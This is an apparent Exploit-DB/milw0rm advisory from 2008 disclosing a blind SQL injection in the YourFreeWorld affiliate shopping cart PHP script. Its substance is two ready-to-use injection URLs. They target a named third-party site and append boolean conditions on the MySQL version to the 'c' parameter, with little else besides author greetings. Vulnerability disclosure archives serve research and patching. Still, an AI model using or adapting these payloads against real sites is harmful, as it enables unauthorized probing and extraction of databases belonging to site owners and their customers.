YourFreeWorld Shopping Cart - Blind SQL Injection

EDB-ID:

6952

Author:

Hussin X

Type:

webapps

Platform:

PHP

Published:

2008-11-02

Shopping Cart ( index.php c )  Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    :http://www.yourfreeworld.com/script/affiliateshoppingcart.php

Demo :
_______
true & false

http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=4
http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=5




Greetz : All my freind

Im TrYaGi

# milw0rm.com [2008-11-02]